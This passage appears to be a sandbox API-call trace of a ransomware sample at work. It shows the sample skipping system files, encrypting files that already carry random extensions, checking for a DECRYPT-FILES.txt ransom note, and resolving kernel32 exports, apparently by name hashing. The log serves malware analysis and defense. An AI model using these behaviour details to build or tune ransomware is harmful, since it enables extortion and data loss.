dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.417] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0185.417] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.417] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\\\DECRYPT-FILES.txt") returned 64 [0185.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.417] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0185.417] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*" [0185.417] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf139e5a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf139e5a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0185.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.417] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf139e5a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf139e5a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.417] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.417] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.417] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf139e5a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf139e5a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf139e5a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.417] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.418] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.418] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.418] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.418] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.418] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.418] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.418] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0185.418] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.418] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0185.418] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\0a16c9.tmp" [0185.418] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.418] CloseHandle (hObject=0x0) returned 0 [0185.418] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.419] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed64aa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.419] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.419] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.419] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0185.419] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0185.419] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0185.419] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0185.419] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaed8ac00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suggested Sites.url.XOScwQd", cAlternateFileName="SUGGES~1.XOS")) returned 1 [0185.419] lstrcmpiW (lpString1="Suggested Sites.url.XOScwQd", lpString2="DECRYPT-FILES.txt") returned 1 [0185.419] lstrcmpiW (lpString1="Suggested Sites.url.XOScwQd", lpString2="autorun.inf") returned 1 [0185.419] lstrcmpiW (lpString1="Suggested Sites.url.XOScwQd", lpString2="boot.ini") returned 1 [0185.419] lstrcmpiW (lpString1="Suggested Sites.url.XOScwQd", lpString2="desktop.ini") returned 1 [0185.419] lstrcmpiW (lpString1="Suggested Sites.url.XOScwQd", lpString2="ntuser.dat") returned 1 [0185.419] lstrcmpiW (lpString1="Suggested Sites.url.XOScwQd", lpString2="iconcache.db") returned 1 [0185.419] lstrcmpiW (lpString1="Suggested Sites.url.XOScwQd", lpString2="bootsect.bak") returned 1 [0185.419] lstrcmpiW (lpString1="Suggested Sites.url.XOScwQd", lpString2="ntuser.dat.log") returned 1 [0185.419] lstrcmpiW (lpString1="Suggested Sites.url.XOScwQd", lpString2="thumbs.db") returned -1 [0185.419] lstrcmpiW (lpString1="Suggested Sites.url.XOScwQd", lpString2="Bootfont.bin") returned 1 [0185.419] lstrlenW (lpString="Suggested Sites.url.XOScwQd") returned 27 [0185.419] lstrcmpiW (lpString1="XOScwQd", lpString2="lnk") returned 1 [0185.419] lstrcmpiW (lpString1="XOScwQd", lpString2="exe") returned 1 [0185.419] lstrcmpiW (lpString1="XOScwQd", lpString2="sys") returned 1 [0185.419] lstrcmpiW (lpString1="XOScwQd", lpString2="dll") returned 1 [0185.419] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0185.419] lstrlenW (lpString="Suggested Sites.url.XOScwQd") returned 27 [0185.419] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0185.419] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="Suggested Sites.url.XOScwQd" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.XOScwQd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.XOScwQd" [0185.419] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.419] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.XOScwQd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.xoscwqd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.420] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=500) returned 1 [0185.420] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.420] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.420] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.420] CloseHandle (hObject=0x268) returned 1 [0185.420] CloseHandle (hObject=0x264) returned 1 [0185.420] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.421] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaedd6ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url.pT0M", cAlternateFileName="WEBSLI~1.PT0")) returned 1 [0185.421] lstrcmpiW (lpString1="Web Slice Gallery.url.pT0M", lpString2="DECRYPT-FILES.txt") returned 1 [0185.421] lstrcmpiW (lpString1="Web Slice Gallery.url.pT0M", lpString2="autorun.inf") returned 1 [0185.421] lstrcmpiW (lpString1="Web Slice Gallery.url.pT0M", lpString2="boot.ini") returned 1 [0185.421] lstrcmpiW (lpString1="Web Slice Gallery.url.pT0M", lpString2="desktop.ini") returned 1 [0185.421] lstrcmpiW (lpString1="Web Slice Gallery.url.pT0M", lpString2="ntuser.dat") returned 1 [0185.421] lstrcmpiW (lpString1="Web Slice Gallery.url.pT0M", lpString2="iconcache.db") returned 1 [0185.421] lstrcmpiW (lpString1="Web Slice Gallery.url.pT0M", lpString2="bootsect.bak") returned 1 [0185.421] lstrcmpiW (lpString1="Web Slice Gallery.url.pT0M", lpString2="ntuser.dat.log") returned 1 [0185.421] lstrcmpiW (lpString1="Web Slice Gallery.url.pT0M", lpString2="thumbs.db") returned 1 [0185.421] lstrcmpiW (lpString1="Web Slice Gallery.url.pT0M", lpString2="Bootfont.bin") returned 1 [0185.421] lstrlenW (lpString="Web Slice Gallery.url.pT0M") returned 26 [0185.421] lstrcmpiW (lpString1="pT0M", lpString2="lnk") returned 1 [0185.421] lstrcmpiW (lpString1="pT0M", lpString2="exe") returned 1 [0185.421] lstrcmpiW (lpString1="pT0M", lpString2="sys") returned -1 [0185.421] lstrcmpiW (lpString1="pT0M", lpString2="dll") returned 1 [0185.421] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0185.421] lstrlenW (lpString="Web Slice Gallery.url.pT0M") returned 26 [0185.421] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0185.421] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="Web Slice Gallery.url.pT0M" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.pT0M") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.pT0M" [0185.421] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.pT0M" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.pt0m"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.422] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=490) returned 1 [0185.422] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.422] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.425] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.426] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.429] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.429] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.434] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.434] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.434] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.434] CloseHandle (hObject=0x268) returned 1 [0185.435] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.435] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.435] CloseHandle (hObject=0x0) returned 0 [0185.436] CloseHandle (hObject=0x264) returned 1 [0185.436] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.436] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.436] GetTickCount () returned 0x1135995 [0185.436] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.439] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.439] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.440] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.443] lstrlenA (lpString="kernel32.dll") returned 12 [0185.443] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.443] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.443] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.443] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.443] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.443] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.443] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.443] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.443] lstrlenA (lpString="ADDATOMA") returned 8 [0185.443] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.443] lstrlenA (lpString="ADDATOMW") returned 8 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.444] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.444] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.444] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.444] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.444] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.444] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.444] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.444] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.444] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.444] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.444] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.444] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.444] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.444] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.444] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.444] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.444] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.444] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.444] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.445] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.445] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.445] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.445] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.445] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.445] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.445] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.445] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.445] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.445] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.445] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.445] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.445] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.445] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.445] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.445] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.445] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.445] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.445] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.446] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.446] lstrcpyA (in: lpString1=0x36fd5a4, 